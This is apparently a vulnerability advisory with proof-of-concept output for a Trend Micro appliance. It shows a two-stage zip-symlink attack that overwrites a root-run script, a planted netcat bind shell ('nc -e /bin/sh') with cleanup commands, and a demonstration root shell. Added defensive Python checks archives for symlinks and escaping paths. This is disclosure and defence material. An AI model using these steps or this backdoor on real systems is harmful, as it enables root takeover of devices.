### Summary:

The vulnerability is that dlp_policy_upload.cgi allows the upload of a zip file, which is stored at a static location: /var/dlp_policy.zip. The problem is that we can then get that file extracted using admin_dlp.cgi. This gets extracted into 2 locations:

```
- /eng_ptn_stores/prod/sensorSDK/data/
- /eng_ptn_stores/prod/sensorSDK/backup_pol/
```

We can then use symlinks to craft a symlink that points to /opt/TrendMicro/MinorityReport/bin/

```
ls -la /eng_ptn_stores/prod/sensorSDK/data/si
lrwxrwxrwx 1 root root 35 Sep 3 01:22 /eng_ptn_stores/prod/sensorSDK/data/si -> /opt/TrendMicro/MinorityReport/bin/
```

Then, all we do is create /eng_ptn_stores/prod/sensorSDK/data/si/dlp_kill.sh with malicious code and get it executed...

### Notes:

- For this particular PoC, all I did was exec a bind shell using netcat, showing that there are no firewall protections...
- Auth is bypassed in an alternate PoC, so we can attack this with the default password...

### Exploitation

This is a clever trick. Basically, we can't traverse since unzip checks for ../ (even though the spec says it's ok). We can still exploit this, however, by extracting a symlink to, say, a directory and then writing into that directory. For example, if you wanted to link to /tmp you would:

```
ln -s /tmp/ pwn
zip --symlinks -r foo.zip pwn
```

Now foo.zip contains the symlink to /tmp. Once this is extracted, the symlink will be written to disk. All we need to do now is create another zip file with the folder and file...

```
zip -r foo.zip pwn/hax.txt
```

Now after extracting foo.zip, we will write hax.txt into /tmp. Of course, we can automate this magic via python.

So, in summary, the steps to attack this target are:

1. Bypass the auth via XXXX
2. upload a zip with a symlink
3. trigger extraction, crafting the malicious symlink
4. upload another zip with the malicious dlp_kill.sh file
5. trigger extraction, the symlink fires and overwrites /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
6. trigger the execution of /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh via admin_dlp.cgi

Greetz to the busticati, you know who you are. My home boys.

```
saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py <target> <pass>
(+) eg: ./poc.py 172.16.175.123 admin
saturn:~ mr_me$ ./poc.py 172.16.175.123 admin123
(+) logged into the target...
(+) performing initial preflight attack...!
(+) uploading the zipped symlink...
(+) successfuly uploaded the zipped symlink
(+) extracting the symlink...
(+) extracted the symlink!
(+) uploading the zipped dlp_kill.sh...
(+) successfuly uploaded the zipped log_cache.sh
(+) extracting the dlp_kill.sh to /opt/TrendMicro/MinorityReport/bin/...
(+) extracted the dlp_kill.sh file!
(+) starting backdoor...
(+) backdoor started !
(+) dont forget to clean /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh !
(+) run: sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
id
uid=0(root) gid=0(root)
uname -a
Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown
cat /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
#!/bin/sh
kill `pidof sensorworker sensormain`
for i in `seq 0 4`; do
    sleep 1;
    sid=`pidof sensormain`
    if [ "$sid" -eq "" ]; then
        break
    else
        if [ $i -eq 4 ]; then
            kill -9 $sid
        fi
    fi
done
`nc -e /bin/sh -lp 2122>/dev/null`
sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
cat /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
#!/bin/sh
kill `pidof sensorworker sensormain`
for i in `seq 0 4`; do
    sleep 1;
    sid=`pidof sensormain`
    if [ "$sid" -eq "" ]; then
        break
    else
        if [ $i -eq 4 ]; then
            kill -9 $sid
        fi
    fi
done
exit
```
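The root cause above is an extraction routine that honours symlink entries and then, on a later extraction, follows a link already sitting in the destination. The two checks that close both stages are: refuse symlink entries outright, and resolve every entry's real on-disk landing path (following any existing links) before writing, rejecting anything that leaves the destination. The following is an added example, not code from the advisory or from the vendor, written in Python because the page mentions automating the zip handling in Python; it builds its own constructed sample archives (the two-stage pair described in the Exploitation section plus a plain `../` traversal) and assumes nothing about the appliance's own CGI code.

```python
import os
import stat
import tempfile
import zipfile

SYMLINK = "symlink entry"
ESCAPE = "escapes destination"


def is_symlink_entry(info: zipfile.ZipInfo) -> bool:
    """Unix-origin zips keep st_mode in the high 16 bits of external_attr.
    That is where `zip --symlinks` records a link; unzip(1) honours it."""
    return stat.S_ISLNK(info.external_attr >> 16)


def audit_zip(zip_path: str, dest_dir: str) -> list:
    """Return (entry_name, reason) findings; an empty list means extraction is safe.

    The escape check resolves the *real* path each entry would land on, so a link
    that an earlier archive already planted inside dest_dir (stage 2 of the attack
    on the page) is followed and caught, not just literal '../' segments.
    """
    findings = []
    dest_real = os.path.realpath(dest_dir)
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            name = info.filename
            if is_symlink_entry(info):
                findings.append((name, SYMLINK))
                continue
            # join() discards dest_real if name is absolute, so '/etc/x' is caught too
            landing = os.path.realpath(os.path.join(dest_real, name))
            if os.path.commonpath([dest_real, landing]) != dest_real:
                findings.append((name, ESCAPE))
    return findings


def safe_extract(zip_path: str, dest_dir: str) -> None:
    """Audit first, then extract. Note the audit/extract window is a TOCTOU gap
    if an attacker can race the filesystem; for a server, extract into a freshly
    created directory owned only by the service to remove that window."""
    findings = audit_zip(zip_path, dest_dir)
    if findings:
        raise ValueError(f"refusing to extract {zip_path}: {findings}")
    with zipfile.ZipFile(zip_path) as zf:
        zf.extractall(dest_dir)


def build_demo_zips(workdir: str) -> dict:
    """Constructed sample input mirroring the page's two-stage technique."""
    paths = {}
    # Stage 1: a symlink entry named 'pwn' (link target is stored as the entry data)
    paths["stage1"] = os.path.join(workdir, "stage1.zip")
    with zipfile.ZipFile(paths["stage1"], "w") as zf:
        link = zipfile.ZipInfo("pwn")
        link.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(link, "/tmp/")
    # Stage 2: a regular file written *through* the link planted by stage 1
    paths["stage2"] = os.path.join(workdir, "stage2.zip")
    with zipfile.ZipFile(paths["stage2"], "w") as zf:
        zf.writestr("pwn/hax.txt", "constructed payload placeholder\n")
    # Classic traversal, which unzip already rejects but a custom extractor may not
    paths["traversal"] = os.path.join(workdir, "trav.zip")
    with zipfile.ZipFile(paths["traversal"], "w") as zf:
        zf.writestr("../../escaped.txt", "x\n")
    # A benign policy archive that should pass
    paths["benign"] = os.path.join(workdir, "ok.zip")
    with zipfile.ZipFile(paths["benign"], "w") as zf:
        zf.writestr("pol/policy.xml", "<policy/>\n")
    return paths


def demo() -> dict:
    """Run the audit over each constructed archive and return the findings."""
    with tempfile.TemporaryDirectory() as work:
        dest = os.path.join(work, "data")
        outside = os.path.join(work, "outside")  # stands in for /opt/.../bin/
        os.makedirs(dest)
        os.makedirs(outside)
        zips = build_demo_zips(work)
        results = {"stage1": audit_zip(zips["stage1"], dest)}
        # Simulate a naive extractor having honoured stage 1: the link now exists on disk
        os.symlink(outside, os.path.join(dest, "pwn"))
        results["stage2"] = audit_zip(zips["stage2"], dest)
        results["traversal"] = audit_zip(zips["traversal"], dest)
        results["benign"] = audit_zip(zips["benign"], dest)
        return results


if __name__ == "__main__":
    for archive, findings in demo().items():
        print(f"{archive}: {findings or 'clean'}")
```

Stage 1 is rejected on the symlink flag alone, and stage 2 is rejected even though its entry name contains no `../`, because the real landing path is resolved through the planted link. Note that Python's own `zipfile` never creates symlinks on extraction (it writes the link target as file data), so the symlink check matters most for extractors that shell out to `unzip`, as the appliance described here does.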